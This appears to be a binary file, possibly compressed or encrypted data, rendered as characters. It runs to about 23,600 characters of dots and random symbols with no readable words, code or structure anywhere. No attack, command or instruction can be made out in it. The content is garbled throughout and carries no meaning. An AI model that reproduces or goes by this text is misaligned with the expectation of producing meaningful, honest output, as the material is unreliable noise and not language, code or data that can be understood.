.[.j.......j..e....#.r..P..B.:V....;...\*[...Z......v|:..N........D..Sl.o.:.].V.....;vO&^2...:...*.A...E.SM+8..gFVc...z......8.m.K.r.|.5...{.1..x.H..wkB.0c0J.%........:4.....Ze..b..5oaY1v...W.(..~........'...'s..2.D.....{.A=...N..Yj..i...pHFx..L......k.R`..y..mg..N]0.........N".C.?y.T.....#gw.Bi..o..A...C.N..A...2g^.....7.E.\....F...........z...O9...&.........}p....o.%^......a.P...ut..{D.lY3B\.v.8g...A..A...U.P.>a...e.D..K"..y.z...y...@.i.kc.........l........Q)..ZF.X.[U....Z#!..w.E.#....|..U.,.q...O..p.....|.;%OX.............H.C.....u.......{Ly=>...vK.,xl..zC..g;......./.y&.....n    .)..Suz..F.HhcS.    .>....L.s...^\..i.
......q0.
d.5.*...i..b...r....qr..
...vvL]+FYG...DnXv..[...|........`.&.*d...D..9uvc.k>....b..'..]..-;.TA...rn/$........nT...<..r....b:'.?...}.b..C...x.P.S.e..*I...KU.PL9.........CK...I?%...a..o...z..s5Q..J.......g.$8..7,O...Yin...a.%Y..m&...Kh....
.....~!...Jd.?.oa._.1.z..j.......p..6..!,....#./..W:....]...VRP...a....B;.4.a..V...&.<R.#..n.X.>.....azm....rP...z.P.d..3.+...:...k..D.Lu..J9.w..z.|Rbm9.j31u..........S.i.Zt..1.8...&*.....Va.p#i.....].F..PX_..L.Qu..F,..UF7lr..~.s....$c;P...aL..|.......Wr...$...~L.*..j..q#hY...JD...q.=...D....S.^~R0...8.y..%......z5\...J.K.c..n|5....f.....{N'-k...o    &...Dd.'. .............,.yp....o.S..S..v..;..y..z.$.Z. ...^.......7..4...,'...w.....
...W...b..~*....n.A.P.W-E@"6 .`..b8..J.W%..JUBk.z..t.R.n.e..&....F /.V-..B7lF..u&S}..U...@n.xm...xH..\.s..xuV.....q.c .-.^.....O.........=...J.....1..J..........*..B.~..E*R.f.>..Y....v.....{Gv.i.....z_N../BmK ....e..f............?H`....0P.J.|l..Y:.0V.)!F.T}q6.Xsa....j..A.o.(...X.>.$.a...{jX..L.P>....`N>....=&m?$.L...85.....l.....-..../...s?.....,d...;.N..g]y[s{..1...CN.....$-.].f..!L..l..#Mp..H...^@'D.6^.>..|,...R.".....L.J.;.z._..p..9..j..9.+.<k.5k..(...;...7.....mm......dI....>^=..H~.58H.    I"...jh9../..3....=:...._p
._..D..]..w........7.....L.......a...+i.......d).^Q.P.@].z..b...[j../....]{...%.:...kO2..R..C....R._...k.Y..I$/.f....z>0.[a&..+-P.@...T.7.....9qL.kf......MpO.;l.R.{n....[l...M.-r.ds...H...&.....#.@<a.?....R......z..z...3{..)..pJ.|..(.;/Z.."0.Z...pv..-...|J..N.$F..J.....R.|.k...0.....3...E..i[Ox.`V.....$A.nS|J......\e......i4c\...a.S.5.&...........A6r&...b8....M..3..%.q8..Z1@.m.......9g.....w.    C^....I......k3...........B..i. G..8".N..U]..m....`y.U}.O.3..Z..r3f1:.i..p{...(.. 8.7.EM..j.y.;.F.;d...A....(f......pC..aE.j.0!#..K.|..B..z,.\.\......\q.H....=....$g$..R..xG......M].....,...g<....p. G..7.zI3.D.........W.H    .w..=.*
.H..._.T..d8.....Sa.4.....#..f......B
...G4s.xw.TM....T.*Cgyg.0r.C..(~.......bd6;./.A...SGQ.U|....V..h.bK.])8....%vF7!.v....#.D..E..(...@...I..I$.L..7\D3..V.....D........f.7....t.$..m.?...m..R.$.;~.Xv|..0wl.-.....F5...........MuZ#.U...T....(.....+.f..J....s..{F...X...#.6.....m..    .b..A.D..E.9...BV.4fV..}
Y...S........ ...aE.....>.'....B.._.B ....'+........ldn}..    :
.u.%.......(....!..~..]s.....h..'.kQn`[>f...J.Y.~'....|,.......`e.......T!>.s...@.LC%i.k...-.`..M.%7....<j..LX.....'..2......<"h=.Zh..I.!m....
6U.>.-.$D5E...k.....{.EJ...S..?..w...S.j..B.........j...Q......r..HO..e.7).E^'...`....@.m.......".$v6h.!..(.l.zC........zV.b-.P+..t.K..K0=.q.N..n.p.....}.v........x.+..%.Rj..Ma...F>...>.....=.S.".Qb.....X...h.v#K.,...".;......vMXg{..cD....:..y.5SN...e........QP.1!.......S.....g.."bL.A".    .8(G.....8w..t.....JJ.....,.....Vlg.@..    (g..#.L...(...M|...Q.f    i...EE*.
D........}.u.....lt%).u.W)..X......Q.] ...0...
...Z.X.........0....s.(....D....!......>kO..J...1;.e.i..A.....k....<...w.j........}F.....qGJ......,...xu.M.M    1e@H.G.{8A ...K..}.d..G,.<k...Js.gT..|.......#....b..q.....*E.L$V|.GM.-.B..K.I..%..........i.&.T...........*)...........r ...."...V............_\O'ZFY..-..P..'jl.*.c9...2......PpJ..:........tD..."`...@H\*IsG}d0+.e...C'...2F...~.g..Gw./...,....r.......y.[.,!.+P}.R..U.....+.....7..!....9qZ;...0.I..'....o..n...n........"....,..J..`.......0....+.....wj.v.{.S.Z.ix.V.G..)...o#R..z'.pV.....R..
....|..r>,...i............U..[..F3.3..m...x..R..M.....    ..O.y.L....&..?X..0...}...<.8....D;_..'..........w\.@U.....|.O/\a.........k...B..PQ..H5.e..../....
...(..Ja....Bp?...-....G.....1V.C?..;
.WV.......?./.........f,.C....X.....-..?.S....|....L.    .......X.......:]...l8. Sv......,..jT.o..W._.l....`.}X.O/.(....b.....[4rs.R].{[.%..G...2..l..}...5.q.Z.....s52(....2."..].yPBTiQ../..].......X*...Tm.#...+{..I...=.......Q9%[)[..!.*@..?.+..i...b3r.v....j..#.A}....v.U..o....N[_......`eq.......*.....fp.>[.&3%..>e.&`...3:w.?G...$....+9..h....8.y..j.S..t........
.x....?......B~.[.x..(..].V.8...<......o..Y>^a...S.e?....n....0.......t..m...W.b...\...v..G?.RHu.....3...U..9.c...."A...}
m....=p|...T.)D..iZLWl......J.zQ.6h........b.!..;..0a!.{F.Am$>T._a.+...M.c{.0...u|.>g.......B...    .#-    .0......$.F!..C..A...j..lKp......J`.i0w....~R.PT..T........ .~.O...t...8l|.3....T.&GJ<.).....#..Z#.9.R..2..{5+.:.0Dh..d..................O...Q....y
6.3[....^........;....^..j..|...l&.....d.*..c...R.f.$...|.y.1..Q(... s6.k.}...jMG...(}..E.h.../...R`y".._G....;Iw.o....;..1...^x......\h.d)+f...mh.V.r......2$9.m....y6...w.]
..0..h...m...I.S.c....\..g..m..U.C...y.Y...I/...s..2.M....~....Pv....tWM..b..a.'...Z.3..=.......+3|...q!.........{..@..QX..[.wn.X......H..F..b....S:.:.v.XSc..9..0..R..^A-..z...t..eX.Jaj........^.......V.x.S"+.W9..........z,jr...q...Bo.f....7E5.....zb..t}j.O.?..e.......:v...X....k7.o.@Z`T..jdF.H\    ...0ba..t..F...+..A"#..B.}..N..w..Y.........5...).....^.C.....w.....:d[.../...4.....y.....!.!.?*.`_....\.M^...:..v.....*y+IO.lK(..k7h;.e..Aq.h.^.....%..0.K..-...=..........b<...a.\..w.=L$.pO..`..KG..E....?.BW.b."...fM.#{fO\..!....t.0D..F..l....{Zu,..........\.._w.>..S.....f8{2..91.G...F......t......."...A.G7.....q".Ur...B...,...{..=..Dz.    >...q..BJ.o.....a.i.TjpK.8....~....B....:....\j>..ncS....M.$.24HdJ..<.d.R]...,....vU4...    .N...c..XM.....4...w....H.,..m.*...^./.U.L.4~OT. .?n....y...A}.D.,...^E...SF.........y..,X+..,........[..`.......?]...]#Odr......h?....EL....,..J+.....d...v....6.rG:.^.A..6?+Q..s.......d.^....M.f...Fp.
.CQ.............6.......q..].....R.Ih...M..W.k.l.ypMY..D:=.pQ.....Dm.&..@.....O.u&.    ;.HbW5....>...1..:..@.\.e-*r...hw(...+h..6..    ......j.@.N....~.. .~{e.A.2.    .....=.k.:r..1...o.A>`.....    ..-...Q2....I.......|..1N.d..gN.O.WG..:.~..0h.P.q..@    !..1...92O=.f....dg...#.V....1d..D6..n@.$d....)m...Z..i..^JE. .....P*9.S.4...T..e.....f.w..5..../...$...nQ6...F..OM.N..U.W.b....;.+.....}....S1..#N..=G.n9..J.+.;.t.s.01..B...3J.C.    #...1.......
.h.(.`.-Q<.p.;.
...6.\.=.".A'{.....!b.......;>.."..+..l.4:T...^v.@...:L.)......6=..i.H,_.*.....O!.A...xke...<#...X......I...O1^.4.:...P........I.i..ya..xv..B.}.O3+.l    `.....Y"..............'.+...P.[.!.\.K..._..!.N..L-.."*d..C.3...}>..PsR...1(ABa.es...c.d.....>...<....4.M...cL......%[.B.............n.j....w.j.l.T....sk    .........l..P.....S
~...o..4.v{..kg;..g.R..~.>G.....'YmGoR%..i.......\LX|.A.j......:...S.\`.N/W..%".......wl.:HL:..S..wv.(4X..!!.......]%...)Y.D.-s...,Ums.-]%.3s8...qvtN.......`..Q.....k...hv..,......*,z|."U.q.9............7....r...\hD...............(..Zb...LC...E..n7Q.....4...R....M.x..Q.I.....'&...\.....<0.......^@g.%R*W.D....B..8.I........6..B.|e.!...Q....w)-=..Rf...z.....S8o=.E..|.>1..ok..j.......L*...g.Ex#f....}j.U...B..$oo+_...."...S"..#..q........!..q...A.##N5kN......H.&.%.[.{.>...0....a\.mW0r..JEo...8i.^.V..~.......d.7..... |G...a..S..j...H.P+..>C;.7..Ol(~W.....=....m.........^..W....f....Zm1..8S...?..Pn.....z....    ........A9.*.....?$pE.1e(..hP.....*z.q....d....0.F.QM'..A9..sf..1t.....OLX-..l3'P'_..0.\p...L...-.x......c...\...Q...;..h.{.C.K..9.XzK...v.M..{.b..B...D).[....R.ea.B...CHG..C...;u..Uc|%.?...\|.1|.z.R..!1H....<....L(..........h...A..;~.<.>.O..,...~zFIC.k.....!{....$\zY.....3.
.......m>...< }=Uh..R...%..O5xo\....D............MM
.!.T.l..).7..x.b..@.=.h...C@qL03vt..{B..o*.....1..h@..z0....4...0T..m.....}.<......U.L.......&.V9|.,..%.......$.8hkNLz.....].....j..Lz.P..v...
...E0......Y..5...m...t.~=.`..H.h)@...k.B.z..........>...(.y.\..Db..c!Y...$...Y9...~..~.d...HM.`.D\...l..%.'.O.7&...a`M.?>..rw../K.......b...).........+2......H.[...u.#.da..Z8:.S
.........a3.....\.\..R...Y...'.V.    hii.o@........r.a...,.....[.Y..p..........-.c.n..|WP.({C.ng.+..M.?q+.    ^w...<....I.8.'..[...0u#....^mjY.34...{..+4.O
J.3.{.e..A...........@"....M;.7(.....1I.....$R.e.....:.......};... ...X_4...XX.......C.W....f.,....cj.mf.ksN..te7j....\..\a.>...h.....,.?<W...Aap..mi......e~."r}M$.}...d.1....-+.j......e.{D...C......0..5RAt....hl.2..xm..P...L...?.y......!.. 6D..Tk...U......c....Yy..>H..+....W.............A.....|K..=t.......    ..../.d..'.............L.ie{.VN.?&..;.V....o......Sxr.<L.(8.n..+..-.D..m5.......w..B.)a:.8.$<..U....J.p.R.e.....I.D@.V.9..L|..pr.h..3v.....    ..._.R.. ..[...H.y..!.w......8....j..@+)+jG.ZK.....A...Z..........1......_..,.3s.(....xL....Z..C.. ..y.(-...!...C
.!V.....G...kd5.......\%.t...3....%\.]..JGX.Yz..b.!m... ]7.Z.Q...^Y.E.....2.gWK....
_n.......8..\.e.$.9...(g4!....2..*.....$^....G...t.+....\..z..(.{L......*Y+....!1...#.Bw.#.....o&d.=.+..u.l.Uy!G.f......_g...[....[.p_;..$C..-1..;UW.@.c_..0.`....s......].2...W.[.F.7...+ki....j6T.....Q    ..A.9......D........!HbNVa...:KF.. ...q.O)=+.5...F..........$.&q.............*=A...-0.........{.@<H..{[n.......T....s......cj......,1...,....WD............)...]\R..T)]b9.{.9cG`...H".^,.6...r.9qs..x.V`Q`....^o...I@
..........$.......V.......
b0Y/.N=9(.H...3..
1....H.r...d.b88>......0`.."dJ*...A.._...."...Om..yLIk..>. ...5).bbd..."    ..Zq5..DX.)..y..0.H@.oN.........0......]............V..YA    ..@..T.{..+.C.i..Ow(............E.H...P^..k<.r\.....{,w.I.t....5yV..3.*............=Bs.X....
.*.._.3.....U....y.~.b...l..9YlN`.S..ao5h.@@g.0...    .........x......h..6.>4...    .q..C.>...#...;..?w\.....\...q..l..=}...y.D|..w..h.p.CS.}y..@..n..p.xu.x..O...$x.4.Z...O..;.....1(...Y..;...x.W......Ms..9... @.Q2_.cU.........1E.'.cmo.H,".........9:.v............Ori...#.?..m.#o......8..E.Lk.7.@........^..~..b..3.G...S.8Q.{{W.%(q...;....<n^?.Mg..q.....DoE(l.{.-jr.......D...xD<?a...Is.+.g..F.=..S.`...x.*...o....B.`#..............\._...mQk.&.Yb...R.H./..+...e...0.G}`.t.X.+..3.......E..T.../.^..jcL..L..u#k...WcR..O.B...l%......^\}.    p&.=............?..v...V...O.J......De.....{...r.`..4.}.?cr...p........c.m.!.
`.qf.M..,aa*.~......(7v.).5R.z.;4.e..qW[..
..T1.A.S...........a.#.S~..n..L.A...g.....|.?03.    a..p.'.~..`"...-k.v..d..%..+.=.o7{s.    i.(0..a..X...V....:..@...e>..!.~....o(={...p.....f..@.^..xc..iq..l......Nj..._C.q.}......X....{.W....^..&..!...m....Y.x..v....@......~...zM.~?...q.c'?w.S..%.D..7T..v8.2..q..m.3..K....D..,..Z..Iz5>.Ci...:B,F.......^......V.....3.G=MS.. .L.z.+Sv.7N.7.*.gI.S..)y...]Z.F.^..X....m.Qz...r.../...z..k..na...j.*F.;."....vX. ^m!E..#9...km.i.S6...........L..hYI[.~..5..r.|.....zW
x...T.1Pw..&....F.;&..fn3.`......$P*&=?
........a`.~...Y....r...w..>H.    ...JL..."...$.).....0#..d,..............Fk2...k..D....r.2G.....8.... .~...}..S.TWUv.=]...0;....7Z.s...|....._..-..Z..=iV...A..V..h.y..J...j....oq....Q.w...!X....g    ...Jxc.u+............z........|'.....o..,+...`d~....-3.O^......4b..a?R.:...,\...2.).    ....i....1..^7..H.U.%./.)B.q..;....~.\...>....J..i..ct...I..=B.Z...~    ....z..qaXe....v..-...p...Oi.ouH..0Q.21G...>.h+..B{^OJ.t.:....n......%...z.^z.....sN..z.MGu..^.m.\.^.).....n=..r.......A-..4. .?T.......:    b.....b^.....1..A3+.9../.9N.>e..bB.G..6...V....a...l...Gi.Q..z.b...:@..
.8.h^........)....o6....-^5I...cD......;....B9D.:.Y..'.S.W'..4M..9w).....-".t`...c}..sb.`.;Y3B..px.........^aN..`....k.._..UlO.O.3eq............H.....<...
.K ./....V...X..w..bN..c.    .,)dmr...2.m.....?eX!HQ....y..h.[.~p.[,.[.6}.T....Tt#.d...;aC.X*,G..I.......}..3.....S.<cg..E.5(.....E....._..8WYIx~5......[.>..^...v..$...I.xLq*...W^!....#..F.f/...3....H......g{...?@.J..3..Z.p....nWU<...8Fz.B.1........g@....>..MR....g9a.....F.3..#.kHYa*...Q...n.....o...|.........i,......G.]o...)x:.........V..
.5..J|Y....`.}......y.q...n..nii.P).t..~...Ug}a.(.*u.Q.....A.5..S.tIi.......`..:j1@....
._....e.mSgeHqa....k.0?.=........Pxc(S..........jv...<xyS......50L...G@..]...........F..c..;.u.......E.~..|.&F.H..jH......ITkT....].....7\....c.ag....b..D2...)_bDoc*...v6............MT..../$R....ka....O.&..L...h..."<C....;.^....{*../.y. ...0}....#5.Oy..^.#'yb....dS...J...P2..Ta...4...;.T.../J>..J.~.(..%{<W..F..q.....l..*.........kO.KC!R.,......+\;........5>...d.nqo..F.C...=q..YN.....]t.lK?=..U.._....e:..!.A|....i.8..B.~.~....&G.=....M....\%z.b8......|`..4g......=..*.).6..BS.[.4f%.D..9...b.....A2..Y...,.........4..U...s.md....[..T.a2..Ky...../>oanM...9...Kb. ,.0'.......u..H....eNj....7.}    ..|ZJ.
..mN.(.(/T.<.n"A4"<......Y}....^..%.F..Z....xj2...y.cN.G.G.../')..F.....y...80.j.\..mLF.2..6.\.zm.B]....M.9....T...Wo.$.AI...n.a...).;h..S.hQB.^FO...,.b..s5............c`..2......2Tz..\AD nR8.^i .&..qw..G=..9.sJW.Z..H...?...5.o...%..p........._,...u.......5.]pSo...........g..3.YT.<[rT;-m.......h..1!..c&.x...2.zA....p......V...+.R.t..v.
.u.....d8.G.*.G.@..=.z......GI.Z..5.e..q...S.7'.*.PJy.U-k...m.k..n*..&8.....j!.+.._..q...*.<J.Fx..w....y..*;T ..oE....D.P...0d..    v.z.n.rA[...9.L......x.,..S$.$.=........1.o}..D..D..h.='...)vX6...Ce:.~......R.....3...{.#I.gM...%.&Ex.t.PvC4...c...U/O8.0....Ok..&..@+u.D-f4:...R...!.,.m.6.4.Sp3.E.v..2fY.Y,...G..i.e..[.l..3...G.9qF..H..........L[.......mg|..C........cxW.MH.rB.........H..2.....L....(.:R.5...vMD'..sv..........c ..... .jB\.S.W..j..6l.....ns..[....y~g......mHD....Yy.?..p:.k{..b.....S8.....f.1.9..6@......}w.`..................]..../.
..]....0....-!BaSRtc.Gv...+.|..Q...C .'z.. ^.~a..o.6z^....HQr..;3..a..tr....E-..W..'...d...,...p}..E]..q.
rk...'..}...e.........V./F_.]n.if*7....x....R....Vdo.e....i.hS?........F.*f.........*..SH7Co...I...#aZ.!......e...H.Q7.M..X8.........(..r.u..~n..s.4.$.1...d..q.<&...R.`.N..+m4 ...~...S...E....E.O.(.8.%.@lS....7..
.. ...!.@._.{;d.x......A!..U..tY;.......I...e..........c.
.8../....9}..>.W.A.1.n........Y..@.K..}...a......[..+....y..@.`.5..*....y.|N...P..^..X.:.t.E.3...>........A...6C}dm.x.........K..x.?0..<..g6..s.a.P.v"*..u_..X........V.jz..V.!.Y ..."!..-....#&..M.+......4....$`...8=.....-.~.t.N..w'.U..I. ......s=.y...P.....~>...a./V.........L.F...~...R\
.W.......O.I=~7..0._E....u.<.,.....O..).Eo-......+M....'.3.w..j%....W....m..5.O*....N......W....i.9..6...Vg...i..L......b...T.o....*-...{A.\...iO.`_.7}A.T
.
h..e........r7...E*.9f.....K0......;...N........3/..r.S.qM.:.8..1............s6.PO.=..U
.......%/..._.......Q..xN..R...~D'<\.Jd$/.c....X?K.g. P...5..8.5..q.......s...4z...
.Q9    .fv<....../&.......%A.b..V.E....@|q.5.`.P.....8.s.4.....#@...R.J.............G..`.....!Y.......^...:..F......s....6..s3K9.Xu...(;6?qq.Y[]-H    o......{...^(.....-..A..'c......".*a.f.....G..1..:..... ..wR.zh...0G...{[nxZs..%....7....%.s}...W.4.90..[.N.".)..r6...#!..R|..V.(/K..T.Z%1....n..j......n\!.M..XY.86.......i...2/ #..bA..5...naJ.u...:.g7.'X .cS.R|z.......P].$..*.;.......C..J...E.+..6%...._.].z..V..X.yc..V..7%..(g]..'......tY".Y.z........S.
.!.2j.......,...+.uFW.,.|....b..$[.\..........|.a....@.D.s....(....|.9.....i?..........v.....@XN...%....k.h..7.v...V.....sK..P.e.m.#.QI.........H.~....A...9.........#Y...H.........}.....$.C    O..Bn...(.......`S._j-..C.(....v.:..[`U..$nB`..G...."|{=.+....`..Mz.9......Q........G.!...v.....w.G..]>}O....\.X.*Z.l.s...    n...7..KxU.,B?].Z...8.Z..;.7 i.Y..utlqN.Q.......|7.......a.O.....r...)..].......x.n..9.r.....>\W.r...Q..Q0?.....?N.ZB..-..:Cj0....
.......UweX.@.......t..H......b............0!q*.B9y..`*.%..1........U......B....8.WxE....z.`..fS.....
.V.W... ....y..=...[.5rfgS...T..._...=.T.-.8.W.).g.....65....f"h......JI.u6:!}...
.....1o..,
.r[5eY........t4.?<.#......d&......p.>.H....bY'.ME@.....l^m.@o`.`f......$*ZF..N...Z..G.V(O3.......P....I...T....9.nD@.5..S.z.dx..Sv...+.. ...;s...0....;.1..C`W..M3..:Kg=X..:.\iS<    ..|.Lv>v..J+}..)w)$E..nA..(!A.q.(-..3J....'...w.F.....>X:.r..>...1..~!.!.vr...~z.<..e+....t....C....o.H..    .JE.[.:..8H.C.......)8z)...H..t.3...OZ...."r...!`kj...T.M....C.i...w\...G..}..u.'.^[9....j....;..z#.../..t....f?..(..v.yP.c...@.D...J.S.N..............2.......%......e!.    .....U..*.&b.z?.C[...Uw.ZLk..i.u`f.N.......ev.E...T`?...nE....(;.|k...p.]..=.....V....@........F@^...
N........]..l..=F.{.......DD.....*..o.J..G..o..t9~]..v..a....4U..e..@.....x.xZ....(.`....LJ...u.3r4.;...R.6ha.Oa.b}.}#.................%..)...........!6.....$@......"C..1o.. B..`......W..U..UUUPUU.GU..U.TUU.UUUU=TF..h........$.e$E...:....].YP{....+....%X.?.K.>WS../G.X>_.Jn.....InQly.krI.9..(.x.C.....C.h....h....&...h.D...."....tH`.....54D.}.).1G.. .`....M.u........U<...-q_&...*.d-1.....z..WK..6K@...p....\..U...H...Y....}.y......o8......
..G6......4j..{.[#......H..`.;.............|....M2X.g..83Fu(.Jpx...}.:..5..g
$..N....HC..........+.l..z.6....".....ipA"|...G..D.Gi.fz^..\kC[f.....4..[K.kU2%.9.>4.../1....#.q"...Q.......{i..:F>l.,..@VqJ..k...5-Qr.............."..J..A.    ...
.<....X........s..T..........JMeNy.!.7~..q.+..W.'..^.2I.Ar8.......O...a........ .@..'...y@.B.`........?2.C...,.J.B.).w.A..y..<..~.....A.K..^f..{.O..E....s..Y.......WD.Jr...U...n..m..\I.N.........+q.@x.j....A..sVT.JNv.N..5.>...W..D%'LooD..;...vZ..3..PiM......d\?....o.mQ....a.K.....m...J.....1...i..
..o...?...!I...o=D..j-.Y.P...[o..$bV........5y....w    ......*l.q.H.A:[......W...4=(8bW7...}.....ftSpa... ...\........4O~.[.Jt.. (.._.
...Lmzi...1.^..
s...Oo.2G._..sWT:3..^U1P.......X.....Z%...g....fLo.w.....!PU..^?]..Xw.6..2.2.k.........P..r8... k........g.Mo^".9.t.!............|..v:.....6?...2|n...........&..Z.w..6.v5...!_...x.....8.G..2.....f..Y ...%..
...#.Y...H/...T.7Vw..R0..~...]..`.S.d;..b....-y....@.-....S...........m..?.=.".. ....Z.?........l.s..(.H)...(.o........84L.7.......].....>........:.."..{.E...y.q3.    ... 5.c...a9..KR..p.....T...S w....w............l..t.."...W.....d.D~M......]E..%.'..&.%.(g.Z.........6b_.;@..g..:.*-o..../...J...R........X..;.o.t.e.qK..w.KZ.......(wdk..    ..#...K.......
..o.r.B......v(4HE..j..N.d.B.3...."=S..}lQ.a...T.8p.Q..../...(_/.._.(5..E..>..F.bV.I.p..P....i...$..@..V.8.Q<lx|.....$..._.(@.n.W.1.t........~L.2~^    ..(.U.6.......l..D    _......o._.g....n.u.%?9hA``.d+{a....I7.....
. .IT.n..
.L.i]..T3...d....?.,...id....KT.....Z.6^-..vX....A.......2$.O....@...^+.Z5...<.W(.$....rb*.+QQXM...&...{ww..&I....%..C...T......M...@l.[.d4^.!..z.....w..t.d..b..,....Hf?.0k.....L4.8....S......f.b..r...*..o..|...7...U......kP..r    ..4p..%......z..x;...Q.K?.-..7.%_...H.._.m7..T.jh...y*.y.O...In...m..^.d......G....#U.....f..f`UP.....Q....~t.fC..T..e..:.M.C..t0. +....l.. ..o..].J*.!I.[..h    g..a,...P...$.D].D............W(. '..6...d.w.0(.Ghs...\..n....    ..`..O.....:.-..N47.@...z.N.|.p..n.d=....M..YB}....UC..CB...PB.....h...).G:W..F0..#..(.l...j..\'.......^..
.V...l.W.1.....hK.&.
...(.D.....-.. .....l...]....c..k!...R..|...~|.#..'b.<:...F.KC\S,.%Y..M{....E..5)E.....5...M.....a$.iq.+.5...t.A..U..cK..HCL.p..q.c2.O.Lp.JK.....l....|%    *.~.--....;.m..........\...6..t.Y.].E.4..}.9$<.\B.#......$....K..YQ0.9l.......
r.7'...Qa0D..~}.g........L.K...R.{...T8b..c...h........Q.0......p.C<C.V[..D?..............L./'...,.".I...s.........%....Y.).7...n..<I).uG.H.%J....kB....@...!.w_..._..t...0.?..%.@v.a.A.e....pW;.`@...i.||.....6`.....
..fE{r..V.W....9.99.......}6....isx..{...-..6j....;_.v...6..:.cp0.0.....<.......c...1.Z.....wB}.W.>..;/.j..........Qh<.QC.....7.3Y(....{.Ur.X.}.o
m..)..Ow.."..:..KB.............>v.>&...,s......V.k(~....J.....nk......@./.b..._i..*?...SkA..w..z...| >..s.Ghp.p
.. .~...3...VN.../...D.....S.8..y[..t8....;.Q#.....P.......N%....7G......,.....;...zh..hOA[....>.R..{&.|..7.%w...........~ .....x..E..8.`......6..K....}VW....:N.%.7e..0...h.#...(...^l.\;........-u.6j.0....w..5.......G..6K.{..f$.wg.{[P...u..$.3\#e..9]z19.6t.5..F..7....w..-\.EiG...n...)..x.(.7..j+..1.....b....,..D..l.6..}........o........$.\:..^.N...M.5'.`....0..h.r.3......u..f_b%.62.c*.....V
...........f*2....L...O..Ds)w..,...*...9~.*X.{..&..y}..^k...d6..U.=MI.....v......8..K...U..ni.[.[...Y...F(1.'...M.N...8..jc-Ml....^............^w5!}..i.78.i....B.....sK..2`.>..a..#..2...ffJ..7. -............E.......L.C.l"    .zD.... -..j}.C(j..^....p.......n...0.F*oY.+......R.....5C...CVg......T.....p..rkf.G.......4...4.......r8O.)..E*.......1...8vnlQ...$1..........j.I.....*.Cd ....I.{..;.dnrA..<r.Nch......._.^.N!/...i....f4T;........[2x..I...%a....s.%.CMb3...8..b..X....._..v....c.."kq......%
...9...?Q}.....*....'<6..p.,H.G.2m.e8...[T.~t.3r55z.^.j.\".W(....\%.../...yO1.^..[:....m*ia.}.k.4_..Q3......4X.....,....b.X.....>:.....%'k.^s....p.T.-]..6.Z..C..o..K:...;8....[9I..m.    }1D.q&....1...\9.....P..<bI....!,."./...(.Q$..l .......&..k~.j&...5...M.k.............    0.
...{..C.G........Nm..j.............pkc..S~...
j!.Z.rY..97.......E.....v)...Ds.C...8.H.,.Zq.}Ut..m....Y..{.t...s...^.(.L.7......p
....{.`..........$cQ.._.d.:....,[7...o...)..\....m...0..#Gh....>+9.........cK}%..x.3R...f.Gt..
...^.......G..}X..PD...p..}....~..e....Y...8..../;f.>.g...o...s....zp...|[.&E...yP.YY........a.A..........R0.._...(.'lR...y...J....OA87R...E.!..!I<..5.{!.8a..g.&......h.kT`......4..CN...'.#s....X.....v.....zs.d.D.....;~.!.fN\...z_H.4..q)..s-`~..1`.>.4rH...6.K....2`.T*.Z.V@.....p~.0./...".....}.;.v...>?.P>.he.<..S6o....(.|.W..'.MU.RZ.|......%u.._Y....CI....@.C.......K..K.d&.1.N.0.'.E|.....R.....=$... .*.;...v....n.La.._
...Jm#.....>U...q.k...4.......    ..z..4;.5..b..C+0q&s........)9g/.^.Yy...<r.y.....'.2,C.....W..h1...{..1.z...G!....wND.!p....@<..
.."+../...*@.=....f.....Y...~.q`.o...z.........r..8.I(.j4..V.....w.}.!.`.].... ..n.....l.a....G...u{..o&...Z".9-v...L......MtT.`.`.h.P.......n~...L.W..+........e.L.E.LH..c.Uh2.7.{..G..%.>\..........,6.....K...@....,.(.....jP....[...ISj...Z4`.....)..O].{2E/h.4S....:..:.[..1l~WK$.\.i.
..#d...p...............H(........r
.f....Bu.j.$...e.t.\|p.)..8}.=.:.....0,.=@.sX.6d..    X...[...U.~.3y4D...,...Q..v.!.qP.\.....M...?.{c.L.].x...Z&..r...^..l.J...A2...G..a....pC..p.^.|...,.t.A...nmC.....B....yPaL..{X.T4-.Z... ...0.$.GFB<B.9...0.?`.
...h)C..s^....M.k.S*.....X..].5..Y..O.L./^?ch..W..GA........C.....W
.n....87..V.]....5....%..x51....%=.H.'\..!V.......q.(.....g.q..]....e..fL.#..m.1\....g.N.......W(.Q....}'....a....I..m.......7.h..>..G.\.i.._.......e....p.aK.....$w.2....pD.:'.....)A....3.T..K....i..DD.}.)h6......{\mQ..Y....>._.?gQ...=.a?.`.!....i....k}i..@..Lk.*@.Rh.jOim2........e.._....[..yv..\...p...p&.J.l[...LJ.KPZ.....P}...o...S.`..(....W.\...J.........WL\.M..m~..d......[&5.Q..u.....5S.'....|....8..jd.U...K....<..eX..z.p
...[.$z.........!v.&.Q.Q..n.......j...[c.....bxv()....A....=..!..a..bkq.6....q..."...N...m.v)....
sEH.\.'....7.&S.......L.LD/.a....1.i...i;.}.R.;...=.p..;.....(.~:......*...|W.....P    /.nN........*....j....X.|...%.G...)./$?>.h.....ziI.8Y.~Z.....hA...k.."s.T........&dm..*....z....N6..J7,.,....n.vd..~z...r...L...e....S...}..Vy.......    i?8
.T...~*i......c..;...M...(.....
X.$E......l$..t>...g.%w.M...;&g.'@.....yM.1..$...%a.`o..i...LF1.<<.=.i.p.uA.U.lL.r...P?..."[y..#...#.....eV...$...0..|].DX.=aZF.....i............[gh..+..c
.=Nq.o....A.....ju..f.b....*.3.._............:.....R....b....Dv.}.`..M<.....EZ...|......B.I*.9Z4.W7c.@..@.z,T..<M....Zm.............b.<......6^...$.G.z...GP...h.q....r\Dq    ...Q...Uu...7.@v:..+..........X?.....E../K    ...w..O.*QC.j.K...D.n..H...M....[...X
P...w|..|....g...X..5..rG'w.k.HT.l|E`.E`.F.Ad..F.1f...8.\.<NA.....x....A
.F]N.%.|...u..#..F.....D....V.......Zoh.RQ5l,...;.]R_=.W....F#{O...h.B.%....L._.x.e.....MP..=E...).(.......;Oe.......f..?.rWe....{L.l{..?...#...Mk.g=....8.....mf......XY..........l.@d@...l...~%.=a.;r.u..3...j}qs.<#..&d.H. zC...Bo.a..}_.Tc.\.....$..FE.R..h.9...k_08f.1..j..3...)...]U..........]6...?dA...a...I........k.....Cl.(LF.......p.JZS2.r.`:.......qw.........6...K6.5vAb...Pqi,.-^.!+...fH6.......D.{!..[J.?..a...d[vi.%.........@...T..cEQ..:.)....]v....s9l..j=q.......n..Dx....8...m...4O.:.gxL#........@4...&...6c.v...H.._.E.Jj....
1    #.....=.....L05cp.=t?L..t-=......aA.(.=..~.mt.}
